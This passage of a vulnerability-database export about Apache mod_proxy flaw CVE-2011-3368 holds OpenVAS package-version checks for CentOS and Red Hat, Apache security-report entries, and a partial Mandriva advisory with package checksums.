\"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-02T10:57:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "Check for the Version of httpd", "modified": "2017-12-28T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881450", "href": "http://plugins.openvas.org/nasl.php?oid=881450", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_id(881450);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "Check for the Version of httpd", "modified": "2017-07-12T00:00:00", "published": "2011-10-21T00:00:00", "id": "OPENVAS:870505", "href": "http://plugins.openvas.org/nasl.php?oid=870505", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. 
(BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_id(870505);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == 
\"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], 
"httpd": [{"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n", "modified": "2013-07-12T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:428F24190DE7AFCBC94D3836B96A0602", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.0.65: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\n", "modified": "2012-01-31T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:5CBB2FE29DAB23F81203059931DCD49C", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.22: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag or\nProxyPassMatch, a remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, 
possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\nNo update of 1.3 will be released. Patches will be published to\nhttps://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/\n", "edition": 5, "modified": "2011-10-05T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:AA5F8228C297859EE599A23F56BA394E", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_proxy reverse proxy exposure", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "edition": 1, "description": "\nAn exposure was found when using mod_proxy in reverse proxy mode.\nIn certain configurations using RewriteRule with proxy flag,\na remote attacker could cause the reverse proxy to\nconnect to an arbitrary server, possibly disclosing sensitive\ninformation from internal web servers not directly accessible to\nattacker.\nNo update of 1.3 will be released. 
Patches will be published to\nhttp://archive.apache.org/dist/httpd/patches/apply_to_1.3.42/\n", "modified": "2011-10-05T00:00:00", "published": "2011-09-16T00:00:00", "id": "HTTPD:F7A5E015190D03DEDD087C99CEE5A140", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 1.3-never: mod_proxy reverse proxy exposure", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-3368"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:144\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apache\r\n Date : September 8, 2011\r\n Affected: 2009.0, 2010.1, 2011., Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been discovered and corrected in apache:\r\n \r\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\r\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\r\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\r\n matches for configuration of a reverse proxy, which allows remote\r\n attackers to send requests to intranet servers via a malformed URI\r\n containing an initial \@ (at sign) character (CVE-2011-3368).\r\n \r\n Packages for 2009.0 are provided as of the Extended Maintenance\r\n Program. 
Please visit this link to learn more:\r\n http://store.mandriva.com/product_info.php?cPath=149&amp;products_id=490\r\n \r\n The updated packages have been patched to correct this issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n a932d2685c4daa809378200b0524c317 2009.0/i586/apache-base-2.2.9-12.13mdv2009.0.i586.rpm\r\n 73bdf263d888a5f14964004c12f6fe56 2009.0/i586/apache-devel-2.2.9-12.13mdv2009.0.i586.rpm\r\n c708cc744997e378b405e924013d4051 2009.0/i586/apache-htcacheclean-2.2.9-12.13mdv2009.0.i586.rpm\r\n fb42f0b16e0cf0b9b99f50875fb934b0 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.13mdv2009.0.i586.rpm\r\n c150a3f0ab2f0447cc1314c561cbbb8a 2009.0/i586/apache-mod_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 342a4ab8754a878929422d07d322db34 2009.0/i586/apache-mod_dav-2.2.9-12.13mdv2009.0.i586.rpm\r\n 150cca6180699492bbf350f1f23aa6fd 2009.0/i586/apache-mod_dbd-2.2.9-12.13mdv2009.0.i586.rpm\r\n 52f30a67eb099d7e1d20686c69fdd541 2009.0/i586/apache-mod_deflate-2.2.9-12.13mdv2009.0.i586.rpm\r\n f5b5a5039cc5f13c286d5cd55276cb70 2009.0/i586/apache-mod_disk_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 903303f230149fbe88f8a5cc1c0ee960 2009.0/i586/apache-mod_file_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 0df9ce8e9b3c4021d4bd0f13f8911ba1 2009.0/i586/apache-mod_ldap-2.2.9-12.13mdv2009.0.i586.rpm\r\n 7c96bb3725f64ea03820aae6b45b2a6d 2009.0/i586/apache-mod_mem_cache-2.2.9-12.13mdv2009.0.i586.rpm\r\n 2983af54ab604883a7cc64cf9972955a 2009.0/i586/apache-mod_proxy-2.2.9-12.13mdv2009.0.i586.rpm\r\n bda1fb3d243ea97a8ec115609a3c1e36 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0.i586.rpm\r\n cbe3ba0bad95f397071a9ab04a3a97c5 2009.0/i586/apache-mod_ssl-2.2.9-12.13mdv2009.0.i586.rpm\r\n 632c6ae498759436b83487afaef9f9df 
2009.0/i586/apache-modules-2.2.9-12.13mdv2009.0.i586.rpm\r\n 0f0e190bf2026886f088ffeaf243b44f 2009.0/i586/apache-mod_userdir-2.2.9-12.13mdv2009.0.i586.rpm\r\n 8556f5990544d1e239565435f704015e 2009.0/i586/apache-mpm-event-2.2.9-12.13mdv2009.0.i586.rpm\r\n f69859bb9197171c5edc309031cfcd4f 2009.0/i586/apache-mpm-itk-2.2.9-12.13mdv2009.0.i586.rpm\r\n 894a436dc5bd4d4177f6de362de510a3 2009.0/i586/apache-mpm-peruser-2.2.9-12.13mdv2009.0.i586.rpm\r\n b88c688e5bf7555e44630012f1b87755 2009.0/i586/apache-mpm-prefork-2.2.9-12.13mdv2009.0.i586.rpm\r\n bcdd82b6d4846966c402a2dd5d7b641d 2009.0/i586/apache-mpm-worker-2.2.9-12.13mdv2009.0.i586.rpm\r\n 21b54c80dadc67221ad5cc0329343d55 2009.0/i586/apache-source-2.2.9-12.13mdv2009.0.i586.rpm \r\n c2b11978f4becbae462db2bf020a0bd7 2009.0/SRPMS/apache-2.2.9-12.13mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 91af9d7b14f280ccbd94d1e93c2115a5 2009.0/x86_64/apache-base-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 4289dbcf5d435f144115d37f9a118e9b 2009.0/x86_64/apache-devel-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n e7e7888ed2d7e82ce4f55d319dc354d7 2009.0/x86_64/apache-htcacheclean-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 5341f9396f6860b1deaf1badfed9c6f2 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n af81e40dab85a97d2d913b6c3a2e5ba3 2009.0/x86_64/apache-mod_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n bf09f623437776e4bb584ef70a58065a 2009.0/x86_64/apache-mod_dav-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n d9394a8d7fa6fd9a7102599dbaa36138 2009.0/x86_64/apache-mod_dbd-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 5ad77a367640a35948e99c58ba2e9aaa 2009.0/x86_64/apache-mod_deflate-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n eca18218ed5884129356e14739b4284c 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n a1e6fe40413404fcd9e45ee862f1448d 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 0d3490eb0a83cd266be094a7a831926b 2009.0/x86_64/apache-mod_ldap-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 61c1baacc989919e0955c1e5714e92eb 
2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 1ff3ec27c26302c9ebe724ec699edbda 2009.0/x86_64/apache-mod_proxy-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n da1080d1dfaa0e5c17736b6efc614f65 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n c47fc6b7f4a3b4824ef9009cfc03ebf9 2009.0/x86_64/apache-mod_ssl-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 603804201a58c4bde7eeb9254d0caf6b 2009.0/x86_64/apache-modules-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 456ca4697133a089f004a1f54213c600 2009.0/x86_64/apache-mod_userdir-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b113323596d0bdb88824c9e940025dab 2009.0/x86_64/apache-mpm-event-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n be041721f9abceb50d65bdb6edd37352 2009.0/x86_64/apache-mpm-itk-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n 9099961b1c82d68ef972116ebe44c6f7 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b1ca9a27d4c02fd845ffbb62b9adb8e5 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n d67c2ef4282309256e51163e67044d8c 2009.0/x86_64/apache-mpm-worker-2.2.9-12.13mdv2009.0.x86_64.rpm\r\n b4972efcb6cb7e4dc5263e7d1e39dea5 2009.0/x86_64/apache-source-2.2.9-12.13mdv2009.0.x86_64.rpm \r\n c2b11978f4becbae462db2bf020a0bd7 2009.0/SRPMS/apache-2.2.9-12.13mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2010.1:\r\n 050b032c27a587a8e3cc7b7f26752255 2010.1/i586/apache-base-2.2.15-3.4mdv2010.2.i586.rpm\r\n cdd5c06f86c9eb38160d95fa5e1e429b 2010.1/i586/apache-devel-2.2.15-3.4mdv2010.2.i586.rpm\r\n c390e7597d9dfe9617d70ab3f5192d43 2010.1/i586/apache-htcacheclean-2.2.15-3.4mdv2010.2.i586.rpm\r\n d96559be627d94d45775e414ec0ae524 2010.1/i586/apache-mod_authn_dbd-2.2.15-3.4mdv2010.2.i586.rpm\r\n f3e11be1e0dd737b7a5137920912bfb1 2010.1/i586/apache-mod_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 702df82aa3df33ac2d085f4d927e6f0d 2010.1/i586/apache-mod_dav-2.2.15-3.4mdv2010.2.i586.rpm\r\n af12753e0e90d50fbab8460d52cd70b2 2010.1/i586/apache-mod_dbd-2.2.15-3.4mdv2010.2.i586.rpm\r\n dccbb7742f2eb8bf9dd6fc6dbd4f9655 
2010.1/i586/apache-mod_deflate-2.2.15-3.4mdv2010.2.i586.rpm\r\n 26757766ba1bd4a9c7148d04588fe50c 2010.1/i586/apache-mod_disk_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n d668ff48b06e5b32d455af7aaae33480 2010.1/i586/apache-mod_file_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 4287845377dc115e5a1585729d8e6b15 2010.1/i586/apache-mod_ldap-2.2.15-3.4mdv2010.2.i586.rpm\r\n 168abd8c322604f7024a90457ced5c16 2010.1/i586/apache-mod_mem_cache-2.2.15-3.4mdv2010.2.i586.rpm\r\n 58fc1f1ae0c7028a8eac5280922482ba 2010.1/i586/apache-mod_proxy-2.2.15-3.4mdv2010.2.i586.rpm\r\n f32d9ff3f404d49b46b8b63a7597623f 2010.1/i586/apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2.i586.rpm\r\n a6d6b0dc82a12609a105b7f13a60c52d 2010.1/i586/apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2.i586.rpm\r\n 01ac6784b890fc3f205ab58fa2708b0c 2010.1/i586/apache-mod_reqtimeout-2.2.15-3.4mdv2010.2.i586.rpm\r\n 7d40b5f9566bbcb5a36a240f3e2281e6 2010.1/i586/apache-mod_ssl-2.2.15-3.4mdv2010.2.i586.rpm\r\n febac785b16900b8f8630277b12f732e 2010.1/i586/apache-modules-2.2.15-3.4mdv2010.2.i586.rpm\r\n 30c0051b4519bfc682da86ef5008fee4 2010.1/i586/apache-mod_userdir-2.2.15-3.4mdv2010.2.i586.rpm\r\n b7991fb35067f7f5b8c43fef70f6c6c1 2010.1/i586/apache-mpm-event-2.2.15-3.4mdv2010.2.i586.rpm\r\n bcc42aefa1d5edc1c8b28d0e87837ba9 2010.1/i586/apache-mpm-itk-2.2.15-3.4mdv2010.2.i586.rpm\r\n 6dd2d6c2c254cdc416cb6394c3ce4642 2010.1/i586/apache-mpm-peruser-2.2.15-3.4mdv2010.2.i586.rpm\r\n b075b7a1a5db8e549513862019dc4d49 2010.1/i586/apache-mpm-prefork-2.2.15-3.4mdv2010.2.i586.rpm\r\n f0a4446d35eb202894a258137c9a39ca 2010.1/i586/apache-mpm-worker-2.2.15-3.4mdv2010.2.i586.rpm\r\n 3662189a98719d869c6cd92339037634 2010.1/i586/apache-source-2.2.15-3.4mdv2010.2.i586.rpm \r\n 3f523608f5ede71397a35e53d7a82ad9 2010.1/SRPMS/apache-2.2.15-3.4mdv2010.2.src.rpm\r\n\r\n Mandriva Linux 2010.1/X86_64:\r\n c2817045a41cac3a60c6050d0c96ed2d 2010.1/x86_64/apache-base-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n ba029050d298b8bf7bdfd0ff0d8dfff2 
2010.1/x86_64/apache-devel-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 9ab0bb04fa5cbab380fc7f4002672f6d 2010.1/x86_64/apache-htcacheclean-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 514f0faa3e12f9a837c80d18c42f096e 2010.1/x86_64/apache-mod_authn_dbd-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 869f6fc17fcb140345c6fc426f00a372 2010.1/x86_64/apache-mod_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n b271b637ef95644aca494751bacb305e 2010.1/x86_64/apache-mod_dav-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 8c1bf792dd53c4cf534eeb66149a021a 2010.1/x86_64/apache-mod_dbd-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 80427734c2bdcb88998cd8f00d518a63 2010.1/x86_64/apache-mod_deflate-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 9d436dfa48708ff1c67430c9f96e744a 2010.1/x86_64/apache-mod_disk_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 43d6300c4cdcd128bd8713009a4b9422 2010.1/x86_64/apache-mod_file_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n d26fb68836d1f1238091ef30e2a29b2b 2010.1/x86_64/apache-mod_ldap-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n f2a231754bbbe745ad472418a1e68dba 2010.1/x86_64/apache-mod_mem_cache-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 69a2515e03e42ca836a7d880ae6d1048 2010.1/x86_64/apache-mod_proxy-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 2a334acc8b0e681c2523d73ba2020980 2010.1/x86_64/apache-mod_proxy_ajp-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 082e3a971973d41d007f6ee8d433a964 2010.1/x86_64/apache-mod_proxy_scgi-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n d0240e4907c53cbc15c38f852f3523f2 2010.1/x86_64/apache-mod_reqtimeout-2.2.15-3.4mdv2010.2.x86_64.rpm\r\n 8947c120a2346c5e608de186e0a3ee75 